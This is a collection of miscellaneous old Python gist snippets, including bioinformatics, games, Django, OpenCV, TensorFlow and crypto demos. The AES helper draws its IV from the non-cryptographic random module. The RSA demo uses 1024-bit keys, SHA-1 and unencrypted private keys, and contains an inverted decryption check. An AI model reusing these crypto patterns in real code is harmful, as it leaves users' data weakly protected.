countgraph.set_use_bigcount(args.bigcount)
print('building k-mer tracking graph')
tracking = khmer_args.create_nodegraph(args, multiplier=1.1)
print('kmer_size: %s' % countgraph.ksize())
print('k-mer countgraph sizes: %s' % countgraph.hashsizes())
# start loading
rparser = khmer.ReadParser(args.input_sequence_filename)
print('consuming input, round 1 -- %s' % args.input_sequence_filename)
countgraph.consume_fasta_with_reads_parser(rparser)
print('Total number of unique k-mers: %s' %
countgraph.n_unique_kmers())
abundance_lists = []
def __do_abundance_dist__(read_parser):
abundances = countgraph.abundance_distribution_with_reads_parser(
read_parser, tracking)
abundance_lists.append(abundances)
print('preparing hist from %s...' %
args.input_sequence_filename)
rparser = khmer.ReadParser(args.input_sequence_filename)
print('consuming input, round 2 -- %s' % args.input_sequence_filename)
__do_abundance_dist__(rparser)
assert len(abundance_lists) == 1, len(abundance_lists)
abundance = {}
for abundance_list in abundance_lists:
for i, count in enumerate(abundance_list):
abundance[i] = abundance.get(i, 0) + count
total = sum(abundance.values())
if 0 == total:
print("ERROR: abundance distribution is uniformly zero; "
"nothing to report.")
print("\tPlease verify that the input files are valid.")
return 1
np_abundance = np.zeros(len(abundance))
max_count = 0
sofar = 0
for row_i, count in sorted(abundance.items()):
if row_i == 0 and not args.output_zero:
continue
np_abundance[row_i] = count
if count > max_count:
max_count = count
sofar += count
if sofar == total:
break
if args.max_abundance:
np_abundance = np_abundance[:args.max_abundance]
max_peaks = peakdet(np_abundance, 100)
min_peak = None
# Find lowest point in the interval
try:
for valley in xrange(max_peaks[0], max_peaks[1]):
if min_peak is None:
min_peak = valley
elif np_abundance[valley] < np_abundance[min_peak]:
min_peak = valley
print min_peak if min_peak is not None else -1
result = 0
except IndexError:
sys.stderr.write("Could not estimate min abundance for %s.\n" % args.input_sequence_filename)
if len(max_peaks) <= 1:
sys.stderr.write("Is there enough data in the FastQ? Only %s peaks have been identified." % len(max_peaks))
result = 1
if args.hist_plot:
plot(np_abundance, args.hist_plot, max_peaks=max_peaks[0:2], min_peaks=min_peak)
return result
if __name__ == '__main__':
exit(main())
```
#### File: hard-gists/5036719/snippet.py
```python
import sublime_plugin
class FileNameOnStatusBar(sublime_plugin.EventListener):
def on_activated(self, view):
path = view.file_name()
if path:
for folder in view.window().folders():
path = path.replace(folder + '/', '', 1)
view.set_status('file_name', path)
else:
view.set_status('file_name', 'untitled')
```
#### File: hard-gists/5051911/snippet.py
```python
import requests
from django.core.files import File
from django.core.files.temp import NamedTemporaryFile
def save_image_from_url(model, url):
r = requests.get(url)
img_temp = NamedTemporaryFile(delete=True)
img_temp.write(r.content)
img_temp.flush()
model.image.save("image.jpg", File(img_temp), save=True)
```
#### File: hard-gists/5073235/snippet.py
```python
import sound
import time
def playNotes(inNotes, inWithEmphisis=False):
for note in inNotes:
sound.play_effect('Piano_' + note)
if (inWithEmphisis):
time.sleep(0.25)
sound.play_effect('Piano_' + note)
time.sleep(0.25)
else:
time.sleep(0.5)
cnotes = ['C3', 'E3', 'G3', 'A3', 'C4', 'A3', 'G3', 'E3']
fnotes = ['F3', 'A3', 'C4', 'D4', 'F4', 'D4', 'C4', 'A3']
gnotes = ['G3', 'B3', 'D4', 'E4', 'F3', 'A3', 'C4', 'D4']
xnotes = ['C3', 'E3', 'F3', 'F3#', 'G3', 'A3#', 'G3', 'G3']
for i in range(2):
playNotes(cnotes)
cnotes[4] = 'A3#'
playNotes(cnotes)
playNotes(fnotes)
cnotes[4] = 'C4'
playNotes(cnotes)
playNotes(gnotes)
playNotes(cnotes, True)
```
#### File: hard-gists/5099161/snippet.py
```python
from Crypto.Cipher import AES
import base64
import random
import hashlib
import os
class AesCrypt256:
"""
Aes Crypter based on pyCrypto
will replace Lib/Norris/AesCrypter.py
>>> c = AesCrypt256()
>>> key = 'mysecret'
>>> text = 'foobar'
>>> c.decrypt(key,c.encrypt(key,text))
'foobar'
>>> c.decryptB64(key,c.encryptB64(key,text))
'foobar'
>>> c.pkcs5_unpad(c.pkcs5_pad('foobar'))
'foobar'
>>> c.pkcs5_unpad(c.pkcs5_pad('foobar-'*10))
'foobar-foobar-foobar-foobar-foobar-foobar-foobar-foobar-foobar-foobar-'
"""
BLOCK_SIZE = 32
def pkcs5_pad(self,s):
"""
padding to blocksize according to PKCS #5
calculates the number of missing chars to BLOCK_SIZE and pads with
ord(number of missing chars)
@see: http://www.di-mgt.com.au/cryptopad.html
@param s: string to pad
@type s: string
@rtype: string
"""
return s + (self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) * chr(self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE)
def pkcs5_unpad(self,s):
"""
unpadding according to PKCS #5
@param s: string to unpad
@type s: string
@rtype: string
"""
return s[0:-ord(s[-1])]
def encrypt(self, key, value):
"""Encrypt value by key
@param key: key to encrypt with
@type key: string
@param value: value to encrypt
@type value: string
@rtype: string
"""
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
key = hashlib.sha256(key).digest()[:self.BLOCK_SIZE]
cipher = AES.new(key, AES.MODE_CBC, iv)
crypted = cipher.encrypt(self.pkcs5_pad(value))
return iv+crypted
def decrypt(self, key, value):
"""Decrypt value by key
@param key: key to decrypt with
@type key: string
@param value: value to decrypt
@type value: string
@rtype: string
"""
key = hashlib.sha256(key).digest()[:self.BLOCK_SIZE]
iv = value[:16]
crypted = value[16:]
cipher = AES.new(key,AES.MODE_CBC,iv)
return self.pkcs5_unpad(cipher.decrypt(crypted))
def encryptB64(self, key, value):
"""Encrypt and return in base64
@param key: key to encrypot with
@type key: string
@param value: value to encrypt
@type value: string
@rtype: string
"""
return base64.b64encode(self.encrypt(key, value))
def decryptB64(self, key, value):
"""decrypt from base64
@param key: key to decrypt with
@type key: string
@param value: value to decrypt in base64
@type value: string
@rtype: string
"""
return self.decrypt(key,base64.b64decode(value))
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: hard-gists/5106221/snippet.py
```python
import numpy
import cv2
import sys
###############################################################################
# Image Matching
###############################################################################
def match_images(img1, img2):
"""Given two images, returns the matches"""
detector = cv2.SURF(400, 5, 5)
matcher = cv2.BFMatcher(cv2.NORM_L2)
kp1, desc1 = detector.detectAndCompute(img1, None)
kp2, desc2 = detector.detectAndCompute(img2, None)
#print 'img1 - %d features, img2 - %d features' % (len(kp1), len(kp2))
raw_matches = matcher.knnMatch(desc1, trainDescriptors = desc2, k = 2) #2
kp_pairs = filter_matches(kp1, kp2, raw_matches)
return kp_pairs
def filter_matches(kp1, kp2, matches, ratio = 0.75):
mkp1, mkp2 = [], []
for m in matches:
if len(m) == 2 and m[0].distance < m[1].distance * ratio:
m = m[0]
mkp1.append( kp1[m.queryIdx] )
mkp2.append( kp2[m.trainIdx] )
kp_pairs = zip(mkp1, mkp2)
return kp_pairs
###############################################################################
# Match Diplaying
###############################################################################
def explore_match(win, img1, img2, kp_pairs, status = None, H = None):
h1, w1 = img1.shape[:2]
h2, w2 = img2.shape[:2]
vis = numpy.zeros((max(h1, h2), w1+w2), numpy.uint8)
vis[:h1, :w1] = img1
vis[:h2, w1:w1+w2] = img2
vis = cv2.cvtColor(vis, cv2.COLOR_GRAY2BGR)
if H is not None:
corners = numpy.float32([[0, 0], [w1, 0], [w1, h1], [0, h1]])
corners = numpy.int32( cv2.perspectiveTransform(corners.reshape(1, -1, 2), H).reshape(-1, 2) + (w1, 0) )
cv2.polylines(vis, [corners], True, (255, 255, 255))
if status is None:
status = numpy.ones(len(kp_pairs), numpy.bool_)
p1 = numpy.int32([kpp[0].pt for kpp in kp_pairs])
p2 = numpy.int32([kpp[1].pt for kpp in kp_pairs]) + (w1, 0)
green = (0, 255, 0)
red = (0, 0, 255)
white = (255, 255, 255)
kp_color = (51, 103, 236)
for (x1, y1), (x2, y2), inlier in zip(p1, p2, status):
if inlier:
col = green
cv2.circle(vis, (x1, y1), 2, col, -1)
cv2.circle(vis, (x2, y2), 2, col, -1)
else:
col = red
r = 2
thickness = 3
cv2.line(vis, (x1-r, y1-r), (x1+r, y1+r), col, thickness)
cv2.line(vis, (x1-r, y1+r), (x1+r, y1-r), col, thickness)
cv2.line(vis, (x2-r, y2-r), (x2+r, y2+r), col, thickness)
cv2.line(vis, (x2-r, y2+r), (x2+r, y2-r), col, thickness)
vis0 = vis.copy()
for (x1, y1), (x2, y2), inlier in zip(p1, p2, status):
if inlier:
cv2.line(vis, (x1, y1), (x2, y2), green)
cv2.imshow(win, vis)
def draw_matches(window_name, kp_pairs, img1, img2):
"""Draws the matches for """
mkp1, mkp2 = zip(*kp_pairs)
p1 = numpy.float32([kp.pt for kp in mkp1])
p2 = numpy.float32([kp.pt for kp in mkp2])
if len(kp_pairs) >= 4:
H, status = cv2.findHomography(p1, p2, cv2.RANSAC, 5.0)
#print '%d / %d inliers/matched' % (numpy.sum(status), len(status))
else:
H, status = None, None
#print '%d matches found, not enough for homography estimation' % len(p1)
if len(p1):
explore_match(window_name, img1, img2, kp_pairs, status, H)
###############################################################################
# Test Main
###############################################################################
if __name__ == '__main__':
"""Test code: Uses the two specified"""
if len(sys.argv) < 3:
print "No filenames specified"
print "USAGE: find_obj.py <image1> <image2>"
sys.exit(1)
fn1 = sys.argv[1]
fn2 = sys.argv[2]
img1 = cv2.imread(fn1, 0)
img2 = cv2.imread(fn2, 0)
if img1 is None:
print 'Failed to load fn1:', fn1
sys.exit(1)
if img2 is None:
print 'Failed to load fn2:', fn2
sys.exit(1)
kp_pairs = match_images(img1, img2)
if kp_pairs:
draw_matches('find_obj', kp_pairs, img1, img2)
cv2.waitKey()
cv2.destroyAllWindows()
else:
print "No matches found"
```
#### File: hard-gists/511440/snippet.py
```python
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.contrib.auth.admin import UserAdmin
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.contrib import admin
class UserCreationFormExtended(UserCreationForm):
def __init__(self, *args, **kwargs):
super(UserCreationFormExtended, self).__init__(*args, **kwargs)
self.fields['email'] = forms.EmailField(label=_("E-mail"), max_length=75)
UserAdmin.add_form = UserCreationFormExtended
UserAdmin.add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'username', '<PASSWORD>', '<PASSWORD>',)
}),
)
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
```
#### File: hard-gists/5181631/snippet.py
```python
import os, time, random
from collections import defaultdict
from System import Console, ConsoleColor, ConsoleKey
from System.Threading import Thread, ThreadStart
class Screen(object):
red = ConsoleColor.Red; green = ConsoleColor.Green; blue = ConsoleColor.Blue;black = ConsoleColor.Black
dimension = (21,39)
def __update_input(self):
mapping = defaultdict(lambda: None,
{ConsoleKey.A:Snake.left,ConsoleKey.J:Snake.left, ConsoleKey.LeftArrow:Snake.left,
ConsoleKey.D:Snake.right,ConsoleKey.L:Snake.right,ConsoleKey.RightArrow:Snake.right,
ConsoleKey.W:Snake.up,ConsoleKey.I:Snake.up,ConsoleKey.UpArrow:Snake.up,
ConsoleKey.S:Snake.down,ConsoleKey.K:Snake.down,ConsoleKey.DownArrow:Snake.down})
while True: self.last_input = mapping[Console.ReadKey(True).Key]
def __init__(self):
self.last_input = None; self.__input_update_thread = Thread(ThreadStart(self.__update_input)); self.__input_update_thread.Start()
os.system("cls") # os.system("clear")
Console.Title = "Snake by LuYU426"
# The next line needed to be commented out on Unix-like systems. However before running, the console needs to be adjusted accordingly
Console.CursorVisible = False; Console.WindowWidth = 80; Console.WindowHeight = 25;Console.BufferHeight = Console.WindowHeight; Console.BufferWidth = Console.WindowWidth
for i in range(0,24):
for j in range(0, 80):
if i == 0 or j == 0: self.__show(j, i, Screen.black, "#")
elif i == 22 or j == 79: self.__show(j, i, Screen.black,"#")
else: self.__show(j, i, Screen.black," ")
def __show(self,left,top,color,content): Console.CursorLeft = left; Console.CursorTop = top; Console.BackgroundColor = color; Console.Write(content)
def show_score(self,score): self.__show(3,23,Screen.black,"Score: {0}".format(score))
def color(self, position, width, height, color):
for row in range(position[0], position[0] + height):
for col in range(position[1], position[1] + width):
self.__show(col * 2 + 1,row + 1,color," ")
class GameLogic(object):
def update(self, screen, snake, fruit, stats):
stats.increase_score()
screen.show_score(stats.current_score)
update_result = snake.update(screen.last_input,fruit.current_position)
if update_result[0] == False: return True
if update_result[1] == True: return False
if update_result[2][0] < 0 or update_result[2][1] < 0: return False
if update_result[2][0] >= Screen.dimension[0] or update_result[2][1] >= Screen.dimension[1]: return False
screen.color(update_result[2],1,1,screen.green)
if update_result[3] is None:
fruit.reset_position()
while snake.position_in_buffer(fruit.current_position): fruit.reset_position()
screen.color(fruit.current_position,1,1,screen.red)
stats.increase_level()
else: screen.color(update_result[3],1,1,screen.black)
return True
def end(self): screen.color((0,0),39,21,Screen.blue)
class Snake(object):
up = 0x00; down = 0x01; left = 0x10; right = 0x11
def __init__(self):
self.__buffer = list(); self.__current_time_slice = 0
self.__buffer = [[Screen.dimension[0]/2 + 1,Screen.dimension[1]/2 + 1]]
self.__current_direction = Snake.up
def __current_speed(self):
_s = 8 - len(self.__buffer)/2
return 1 if _s < 1 else _s
def position_in_buffer(self, fruit_pos):
for item in self.__buffer:
if item == fruit_pos:
return True
return False
# returns [whether_need_update_screen(bool), whether_fail(bool), head_pos_to_draw(x,y), tail_pos_to_remove(x,y)]
def update(self, direction, fruit_pos):
self.__current_time_slice += 1
self.__current_time_slice %= self.__current_speed()
if self.__current_time_slice != 0: return [False, False]
if direction is None: direction = self.__current_direction
if direction ^ self.__current_direction == 0x01: direction = self.__current_direction
self.__current_direction = direction; candidate = [0, 0]; head = self.__buffer[len(self.__buffer) - 1]
candidate[0] = head[0] + 1 if self.__current_direction == Snake.down else head[0] - 1 if self.__current_direction == Snake.up else head[0]
candidate[1] = head[1] + 1 if self.__current_direction == Snake.right else head[1] - 1 if self.__current_direction == Snake.left else head[1]
if self.position_in_buffer(candidate): return [True, True]
if candidate == fruit_pos: self.__buffer.append(candidate); return [True, False, candidate, None]
else:
self.__buffer.append(candidate); tail = self.__buffer[0]; self.__buffer.remove(tail)
return [True, False, candidate, tail]
class Fruit(object):
def __init__(self): self.reset_position()
@property
def current_position(self): return self.__position
def reset_position(self): self.__position = [random.randint(0,Screen.dimension[0]-1),random.randint(0,Screen.dimension[1]-1)]
class Stastics(object):
def __init__(self): self.current_score = 0; self.__level = 0
def increase_score(self): self.current_score += 1
def increase_level(self): self.__level += 1; self.current_score += pow(2,self.__level-1)
if __name__ == "__main__":
screen = Screen(); logic = GameLogic(); stats = Stastics(); fruit = Fruit(); snake = Snake()
while snake.position_in_buffer(fruit.current_position): fruit.reset_position()
screen.color(fruit.current_position,1,1,screen.red)
while logic.update(screen, snake, fruit, stats): time.sleep(0.05)
logic.end()
```
#### File: hard-gists/5232301/snippet.py
```python
import os
import M2Crypto
def empty_callback():
return
# Seed the random number generator with 1024 random bytes (8192 bits)
M2Crypto.Rand.rand_seed(os.urandom(1024))
# Generate public/private key pair for Alice
print "Generating a 1024 bit private/public key pair for Alice..."
# If you don't like the default M2Crypto ASCII "progress"
# bar it makes when generating keys, you can use:
# Alice = M2Crypto.RSA.gen_key (1024, 65537, empty_callback)
# You can change the key size, though key lengths < 1024 are
# considered insecure
# The larger the key size the longer it will take to generate
# the key and the larger the signature will be when signing
# You should probably leave the public exponent at 65537
# (http://en.wikipedia.org/wiki/Rsa#Key_generation_2)
Alice = M2Crypto.RSA.gen_key(1024, 65537)
# Save Alice's private key
# The 'None' tells it to save the private key in an unencrypted format
# For best security practices, you'd use:
# Alice.save_key ('Alice-private.pem')
# That would cause the private key to be saved in an encrypted format
# Python would ask you to enter a password to use to encrypt the key file
# For a demo script though it's easier/quicker to just use 'None'
Alice.save_key('Alice-private.pem', None)
# Save Alice's public key
Alice.save_pub_key('Alice-public.pem')
# Generate public/private key pair for Bob
print "Generating a 1024 bit private/public key pair for Bob..."
Bob = M2Crypto.RSA.gen_key(1024, 65537)
Bob.save_key('Bob-private.pem', None)
Bob.save_pub_key('Bob-public.pem')
# Alice wants to send a message to Bob, which only Bob will be able to decrypt
# Step 1, load Bob's public key
WriteRSA = M2Crypto.RSA.load_pub_key('Bob-public.pem')
# Step 2, encrypt the message using that public key
# Only Bob's private key can decrypt a message encrypted using Bob's public key
CipherText = WriteRSA.public_encrypt(
"This is a secret message that can"
"only be decrypted with Bob's private key",
M2Crypto.RSA.pkcs1_oaep_padding)
# Step 3, print the result
print "\nAlice's encrypted message to Bob:"
print CipherText.encode('base64')
# Step 4 (optional), sign the message so Bob knows it really was from Alice
# 1) Generate a signature
MsgDigest = M2Crypto.EVP.MessageDigest('sha1')
MsgDigest.update(CipherText)
Signature = Alice.sign_rsassa_pss(MsgDigest.digest())
# 2) Print the result
print "Alice's signature for this message:"
print Signature.encode('base64')
# Bob wants to read the message he was sent
# Step 1, load Bob's private key
ReadRSA = M2Crypto.RSA.load_key('Bob-private.pem')
# Step 2, decrypt the message using that private key
# If you use the wrong private key to try to decrypt the message it
# generates an exception, so this catches the exception
try:
PlainText = ReadRSA.private_decrypt(
CipherText, M2Crypto.RSA.pkcs1_oaep_padding)
except:
print "Error: wrong key?"
PlainText = ""
if PlainText == "":
# Step 3, print the result of the decryption
print "Message decrypted by Bob:"
print PlainText
# Step 4 (optional), verify the message was really sent by Alice
# 1) Load Alice's public key
VerifyRSA = M2Crypto.RSA.load_pub_key('Alice-public.pem')
# 2 ) Verify the signature
print "Signature verificaton:"
MsgDigest = M2Crypto.EVP.MessageDigest('sha1')
MsgDigest.update(CipherText)
if VerifyRSA.verify_rsassa_pss(MsgDigest.digest(), Signature) == 1:
print "This message was sent by Alice.\n"
else:
print "This message was NOT sent by Alice!\n"
# Generate a signature for a string
# Use Bob's private key
SignEVP = M2Crypto.EVP.load_key('Bob-private.pem')
# Begin signing
SignEVP.sign_init()
# Tell it to sign our string
SignEVP.sign_update(
'This is an unencrypted string that will be signed by Bob')
# Get the final result
StringSignature = SignEVP.sign_final()
# Print the final result
print "Bob's signature for the string:"
print StringSignature.encode('base64')
# Verify the string was signed by Bob
PubKey = M2Crypto.RSA.load_pub_key('Bob-public.pem')
# Initialize
VerifyEVP = M2Crypto.EVP.PKey()
# Assign the public key to our VerifyEVP
VerifyEVP.assign_rsa(PubKey)
# Begin verification
VerifyEVP.verify_init()
# Tell it to verify our string, if this string is not identicial to the
# one that was signed, it will fail
VerifyEVP.verify_update(
'This is an unencrypted string that will be signed by Bob')
# Was the string signed by Bob?
if VerifyEVP.verify_final(StringSignature) == 1:
print "The string was successfully verified."
else:
print "The string was NOT verified!"
```
#### File: hard-gists/5263533/snippet.py
```python
import sys
import yaml
import json
def convert(infile):
x = yaml.load(open(infile, 'r').read())
print "Converting"
print x
for container in x['SURVIVAL']:
print "Entering " + container
x['SURVIVAL'][container] = json.loads(x['SURVIVAL'][container])
if container in ('potion', 'stats', 'bedSpawnLocation'):
continue # nothing to do here.
for item in x['SURVIVAL'][container]:
# Do some magic here..
print " Found a %s at pos %s" %(x['SURVIVAL'][container][item]['is']['type'], item)
val = x['SURVIVAL'][container][item]
if val.has_key('is'):
print ' - Fixing "is" -> "==":"org.bukkit.inventory.ItemStack"'
t = val['is']
t['=='] = "org.bukkit.inventory.ItemStack"
del val['is']
val = t
if val.has_key('meta'):
print ' - Fixing meta with "==": "ItemMeta",'
val['meta']['=='] = 'ItemMeta'
x['SURVIVAL'][container][item] = val
print "Returning as serialised json"
return json.dumps(x)
### main loop
if __name__ == '__main__':
for x in sys.argv[1:]:
print "Converting %s" % x
outfile = x.replace('.yml', '.json')
out = convert(x)
of = open(outfile, 'w')
of.write(out)
of.close()
```
#### File: hard-gists/5267494/snippet.py
```python
import webapp2
from twilio import twiml
from twilio.rest import TwilioRestClient
class SendSMS(webapp2.RequestHandler):
def get(self):
# replace with your credentials from: https://www.twilio.com/user/account
account_sid = "ACxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
auth_token = "xxxxxxxxxxxxxxxxxxxxxxxxxx"
client = TwilioRestClient(account_sid, auth_token)
# replace "to" and "from_" with real numbers
rv = client.sms.messages.create(to="+14155551212",
from_="+14085551212",
body="Hello Monkey!")
self.response.write(str(rv))
app = webapp2.WSGIApplication([('/send_sms', SendSMS)],
debug=True)
```
#### File: hard-gists/5284646/snippet.py
```python
import os
import sys
import atexit
import json
import time
import tempfile
import wave
import traceback
import urllib2
from subprocess import check_output
from Queue import Queue, Empty
import numpy as np
import pyaudio
class Spectrum(object):
FORMAT = pyaudio.paFloat32
CHANNELS = 1
FRAME_SIZE = 512
RATE = 16000 # Hz
def frames(self, n):
return int(n*self.RATE/self.FRAME_SIZE)
def __init__(self):
self.speak = Queue()
self.pa = pyaudio.PyAudio()
self.last_samples = None
atexit.register(self.pa.terminate)
# fft結果のインデックスに対応する周波数値の計算。今回使わなかった。
# self.freq = np.fft.fftfreq(self.FRAME_SIZE, d=self.RATE**-1)
self.begin = self.FRAME_SIZE*3/8
self.end = self.FRAME_SIZE/2
self.fque = np.zeros((self.frames(1.0), self.end-self.begin), np.float32)
self.buff = np.zeros((self.frames(5.0), 512), np.float32)
def fft(self, samples):
win = np.hanning(len(samples))
res = np.fft.fftshift(np.fft.fft(win*samples))
return 20*np.log10(np.abs(res))
def callback(self, in_data, frame_count, time_info, status):
try:
data = np.fromstring(in_data, np.float32)
self.buff[0] = data
self.buff = np.roll(self.buff, -1, axis=0)
if self.status == 0: # 切り出しを始めたら環境音成分平均値の更新は一時停止。
self.fque = np.roll(self.fque, 1, axis=0)
self.fque[0] = self.fft(data)[self.begin:self.end]
# これが環境音成分の平均値
average = np.average(self.fque, axis=0)
values = self.fque[0] - average # fft結果から差っ引く
volume = np.average(values)
if self.status:
self.count += 1
else:
self.count == 0
if self.status < 5:
if volume>5:
self.status += 1
else:
self.status = 0
elif self.status == 5:
if volume<5:
self.status += 1
elif self.status < 15:
if volume<5:
self.status += 1
else:
self.status -= 1
else:
self.status = 0
self.speak.put(self.buff[-self.count-2:])
if self.debug:
pr = [min(9, max(0, int(v/10))) for v in values]
print ''.join([str(i) for i in pr]), self.status
return (in_data, self.recording)
except KeyboardInterrupt:
self.recording = pyaudio.paAbort
def start(self, debug=False):
self.debug = debug
self.status = 0
self.count = 0
self.recording = pyaudio.paContinue
self.stream = self.pa.open(format = self.FORMAT,
channels = self.CHANNELS,
rate = self.RATE,
input = True,
output = False,
frames_per_buffer = self.FRAME_SIZE,
stream_callback = self.callback)
self.stream.start_stream()
def stop(self):
self.recording = pyaudio.paAbort
while self.stream.is_active():
time.sleep(0.5)
self.stream.start_stream()
self.stream.close()
RECOGNIZE_URL = "https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=ja-JP"
# RECOGNIZE_URL += "&maxresult=10" # これで候補のトップ10が返る。
FLAC_TOOL = 'flac'
def recognize(fpath):
flac = open(fpath,"rb").read()
header = {'Content-Type' : 'audio/x-flac; rate=16000'}
req = urllib2.Request(RECOGNIZE_URL, flac, header)
data = urllib2.urlopen(req)
params = json.loads(data.read())
return params
def main(spe):
while 1:
try:
buff = spe.speak.get(timeout=3)
with tempfile.NamedTemporaryFile(suffix='.wav') as fp:
f = wave.open(fp, 'w')
f.setnchannels(1)
f.setsampwidth(2)
f.setframerate(16000)
f.writeframes(np.int16(buff*32768).tostring())
f.close()
check_output([FLAC_TOOL, '-sf', fp.name])
output = os.path.splitext(fp.name)[0] + '.flac'
res = recognize(output)
for i in res.get('hypotheses', []):
print i['confidence'], i['utterance']
except KeyboardInterrupt:
raise SystemExit(0)
except Empty:
pass
except:
traceback.print_exc()
time.sleep(5)
if __name__=='__main__':
spe = Spectrum()
spe.start(False)
try:
main(spe)
finally:
spe.stop()
```
#### File: hard-gists/5297676/snippet.py
```python
from scene import *
from random import randint, choice
from math import cos, sin
screen_size = Size(768, 1024)
score = 0
def update_score(n=1):
global score
if n == 'reset':
score = 0
else:
score += n
class Field(object):
def __init__(self):
size = screen_size
self.lines = [(0, 0, 0, size.h), (size.w, 0, size.w, size.h), (0, size.h, size.w, size.h), (0, screen_size.h/2, screen_size.w, screen_size.h/2)]
def draw(self):
stroke_weight(3)
ellipse(screen_size.w/2-10, screen_size.h/2-10, 20, 20)
for l in self.lines:
line(*l)
class Player(object):
def __init__(self):
self.rect = Rect(screen_size.w/2-50, 50, 100, 20)
self.pos = self.rect.center()
self.size = self.rect.size()
self.lives = 3
def update(self):
g = gravity()
self.rect.x += g.x * 50
self.rect.x = min(screen_size.w - 100, max(0, self.rect.x))
def draw(self):
rect(*self.rect)
class Ball(object):
def __init__(self):
self.radius = 10
self.pos = Point(screen_size.w/2-self.radius, screen_size.h/2-self.radius)
self.rect = Rect(self.pos.x, self.pos.y, self.radius*2, self.radius*2)
self.vx = choice((randint(-4, -1), randint(1, 4)))
self.vy = randint(3, 5)
def collide_with_paddle(self, object1):
if self.rect.intersects(object1.rect):
self.rect.y = object1.rect.top()
self.bounce('y')
update_score()
pos = self.rect.center().x - object1.rect.center().x
self.vx = pos/10
def bounce(self, direction='y'):
if direction == 'y':
self.vy *= -1
elif direction =='x':
self.vx *= -1
def update(self):
self.rect.x += self.vx
self.rect.y += self.vy
if self.rect.x + self.radius >= screen_size.w:
self.rect.x = screen_size.w - self.radius
self.bounce('x')
if self.rect.x - self.radius <= 0:
self.rect.x = self.radius
self.bounce('x')
if self.rect.y + self.radius >= screen_size.h:
self.rect.y = screen_size.h - self.radius
self.bounce('y')
def draw(self):
fill(1,1,0)
no_stroke()
ellipse(*self.rect)
class Game(Scene):
def setup(self):
self.frame_count = 0
self.field = Field()
self.p1 = Player()
self.balls = []
def add_ball(self, n=1):
self.balls.append(Ball())
def draw(self):
self.frame_count = (self.frame_count + 1) % 1600
if self.frame_count % 1600 == 0:
self.add_ball()
if len(self.balls) == 0:
self.add_ball()
text('Score: %s' % score, x=screen_size.w/2, y=screen_size.h-50, font_size=25)
text('Lives: %s' % self.p1.lives, x=100, y=screen_size.h-50, font_size=24)
text('Balls: %s' % len(self.balls), x=screen_size.w-100, y=screen_size.h-50, font_size=24)
self.field.draw()
self.p1.update()
self.p1.draw()
for ball in self.balls:
ball.update()
ball.draw()
ball.collide_with_paddle(self.p1)
if ball.rect.y < -ball.rect.h/2:
self.p1.lives -= 1
del self.balls[self.balls.index(ball)]
if self.p1.lives < 1:
main_scene.switch_scene(GameoverScreen())
class StartScreen(Scene):
def setup(self):
self.pos = Point(screen_size.w/2, screen_size.h/2)
self.info = '''
The goal of the game is to keep the ball(s) inside the field for as long as you possibly
can. Whenever a ball bounces on the paddle, you are rewarded with a point. You have three
lives. If a ball passes the paddle, you will loose a life.
Touch anywhere on the screen to start'''
def draw(self):
text(self.info, x=self.pos.x, y=self.pos.y, font_size=18, alignment=5)
def touch_began(self, touch):
main_scene.switch_scene(Game())
class GameoverScreen(Scene):
def setup(self):
self.text = 'Game Over!'
def draw(self):
text(self.text, x=screen_size.w/2, y=screen_size.h/2, font_size=64, alignment=5)
def touch_began(self, touch):
main_scene.switch_scene(Game())
class MultiScene (Scene):
def __init__(self, start_scene):
self.active_scene = start_scene
self.tmp_t = 0
def switch_scene(self, new_scene):
self.active_scene = new_scene
self.setup()
def setup(self):
global screen_size
screen_size = self.size
self.tmp_t = self.t
self.active_scene.setup()
def draw(self):
background(0,0,0)
fill(1,1,1)
self.active_scene.touches = self.touches
self.active_scene.t = self.t - self.tmp_t
self.active_scene.draw()
def touch_began(self, touch):
self.active_scene.touch_began(touch)
def touch_moved(self, touch):
self.active_scene.touch_moved(touch)
def touch_ended(self, touch):
self.active_scene.touch_ended(touch)
main_scene = MultiScene(StartScreen())
run(main_scene, PORTRAIT)
```
#### File: hard-gists/5297697/snippet.py
```python
from scene import *
class MyScene (Scene):
def setup(self):
self.xybegin = Point(0,0)
self.lines = []
def draw(self):
background(0, 0, 0)
fill(0, 0, 1)
stroke(0, 0, 1)
stroke_weight(3)
for l in self.lines:
line(*l)
text(str(len(self.lines)), x=100,y=100)
def touch_began(self, touch):
x = touch.location.x
y = touch.location.y
self.xybegin = Point(x,y)
def touch_moved(self, touch):
x = touch.location.x
y = touch.location.y
ppos = touch.prev_location
self.lines.append((ppos.x, ppos.y, x, y))
def touch_ended(self, touch):
x = touch.location.x
y = touch.location.y
ppos = touch.prev_location
self.lines.append((ppos.x, ppos.y, x, y))
run(MyScene())
```
#### File: hard-gists/52bba57f724e38229da9d85fbc85b673/snippet.py
```python
import tensorflow as tf
import numpy as np
FC_SIZE = 1024
DTYPE = tf.float32
def _weight_variable(name, shape):
return tf.get_variable(name, shape, DTYPE, tf.truncated_normal_initializer(stddev=0.1))
def _bias_variable(name, shape):
return tf.get_variable(name, shape, DTYPE, tf.constant_initializer(0.1, dtype=DTYPE))
def inference(boxes, dataconfig):
prev_layer = boxes
in_filters = dataconfig.num_props
with tf.variable_scope('conv1') as scope:
out_filters = 16
kernel = _weight_variable('weights', [5, 5, 5, in_filters, out_filters])
conv = tf.nn.conv3d(prev_layer, kernel, [1, 1, 1, 1, 1], padding='SAME')
biases = _bias_variable('biases', [out_filters])
bias = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(bias, name=scope.name)
prev_layer = conv1
in_filters = out_filters
pool1 = tf.nn.max_pool3d(prev_layer, ksize=[1, 3, 3, 3, 1], strides=[1, 2, 2, 2, 1], padding='SAME')
norm1 = pool1 # tf.nn.lrn(pool1, 4, bias=1.0, alpha=0.001 / 9.0, beta = 0.75, name='norm1')
prev_layer = norm1
with tf.variable_scope('conv2') as scope:
out_filters = 32
kernel = _weight_variable('weights', [5, 5, 5, in_filters, out_filters])
conv = tf.nn.conv3d(prev_layer, kernel, [1, 1, 1, 1, 1], padding='SAME')
biases = _bias_variable('biases', [out_filters])
bias = tf.nn.bias_add(conv, biases)
